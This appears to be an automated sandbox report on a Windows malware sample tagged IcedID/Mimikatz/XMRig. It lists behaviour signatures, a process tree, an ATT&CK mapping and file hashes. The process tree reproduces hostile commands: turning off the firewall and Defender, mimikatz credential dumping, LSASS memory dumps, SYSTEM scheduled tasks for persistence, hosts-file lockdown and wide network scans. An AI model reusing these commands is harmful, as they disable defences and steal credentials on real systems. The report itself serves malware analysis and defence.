Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
24-08-2024 01:01
General
-
Target
2024-08-24_bb8927f0c1d50249d3502dfdef2503d2_hacktools_icedid_mimikatz.exe
-
Size
8.6MB
-
MD5
bb8927f0c1d50249d3502dfdef2503d2
-
SHA1
c2f6d30ae0195140d336a18be185237ce658e135
-
SHA256
89034a71deda279b1e49f76da222dab7023ff5c2f6c3b6737d84598821dee955
-
SHA512
1acac6eb18b856c1108845580673071d423cc164391d67c715e377c96f863f1bd5c89d634d2328aacc73ae065ba08d08258c922e36e5db313229b5797d99ae5a
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (20034) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 35 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\ekleagute\pcgcfj.exe"C:\Windows\TEMP\ekleagute\pcgcfj.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-08-24_bb8927f0c1d50249d3502dfdef2503d2_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-24_bb8927f0c1d50249d3502dfdef2503d2_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bipepyze\sabzgqz.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\bipepyze\sabzgqz.exeC:\Windows\bipepyze\sabzgqz.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\bipepyze\sabzgqz.exeC:\Windows\bipepyze\sabzgqz.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\tsmmkppcn\mbklagvue\wpcap.exeC:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exeC:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tsmmkppcn\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\tsmmkppcn\Corporate\vfshost.exeC:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 772 C:\Windows\TEMP\tsmmkppcn\772.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 1012 C:\Windows\TEMP\tsmmkppcn\1012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2052 C:\Windows\TEMP\tsmmkppcn\2052.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2684 C:\Windows\TEMP\tsmmkppcn\2684.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2972 C:\Windows\TEMP\tsmmkppcn\2972.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2996 C:\Windows\TEMP\tsmmkppcn\2996.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 408 C:\Windows\TEMP\tsmmkppcn\408.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3776 C:\Windows\TEMP\tsmmkppcn\3776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3868 C:\Windows\TEMP\tsmmkppcn\3868.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3928 C:\Windows\TEMP\tsmmkppcn\3928.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4020 C:\Windows\TEMP\tsmmkppcn\4020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 804 C:\Windows\TEMP\tsmmkppcn\804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4364 C:\Windows\TEMP\tsmmkppcn\4364.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3976 C:\Windows\TEMP\tsmmkppcn\3976.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3736 C:\Windows\TEMP\tsmmkppcn\3736.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3648 C:\Windows\TEMP\tsmmkppcn\3648.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 1564 C:\Windows\TEMP\tsmmkppcn\1564.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exeC:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2388 C:\Windows\TEMP\tsmmkppcn\2388.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\tsmmkppcn\mbklagvue\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\tsmmkppcn\mbklagvue\pejfeyype.exepejfeyype.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\hmhriy.exeC:\Windows\SysWOW64\hmhriy.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\sabzgqz.exe1⤵
-
C:\Windows\ime\sabzgqz.exeC:\Windows\ime\sabzgqz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\sabzgqz.exe1⤵
-
C:\Windows\ime\sabzgqz.exeC:\Windows\ime\sabzgqz.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
33.3MB
MD54d8a50b9276a96b599b78f324b069fa3
SHA114f9563e96e7609e4ebb5da4e9d2adddb66180a6
SHA2568587f24bd897ebea8bf95b199d4c6d7868b107882400453171cabc53eaf9427e
SHA5129e7f83367ed2a3126dcc16cd0803c1b36e0c9f7fe1fdb0f46e695d90e2afc7d389a93405477b51d0880f3fc92ec59bf7c72fa7244e77bb134131f0bd53d01720
-
Filesize
4.1MB
MD51e6f52c139048662a86e6136ccec4cf3
SHA16816a880c7dfe437246cd2df2f20df84cb0a8299
SHA256bc8300019083b987bb3e021c0acede74cef01ae1b21fe4b15f0f95271c511a92
SHA5124758ef57e448d5fad76c82dcedcf255ccb9055be26c188ff94d4c2d36a1f161c9753e36f8e477f5ba43392dba267b4bb05ca443fd3e8148daddcc2bce234e651
-
Filesize
7.5MB
MD5733c3e5bf9ce7d4a3bfc71678594f789
SHA1bbc8506d7f8785feeb448a7302f91240d831fa05
SHA256dfbc89cbe7027d3fc7195e809a3b4435eacd1ef48686ffce07394e2d12f50dac
SHA5123e4ccaad3d3c716ac14fc1ca16e69b7919b4e0eb79d390d84c5f684cc762b978660fe89ea126351007f6105eb13ba421c8dda9502ede324f88d8d6efd93a87db
-
Filesize
814KB
MD5254e0d9656346b24dcb090cddb827b6e
SHA108dc3531a0ceecb7b8d539986071664873be3be6
SHA25652a271e5acd4c44f00b6240cabcd08356c233612da9e475d549b0abb1a94aa9e
SHA5123900518e426eb2b5e91dbdef900c03f300c26fbfb332a9bc6acae97dd543de0af0ca38d692248c213188852a0756170df7105c5feea2a60ef7a5d2712cfcac30
-
Filesize
4.0MB
MD50fea34f86d407083b07268ea4d403933
SHA1836680bbbf3ed4b928c090ebbe8bdeab4e208bd6
SHA256835799443e946c370103d774fa4f1657e1a8a3cb7c7e9c9b320fea111f55be2d
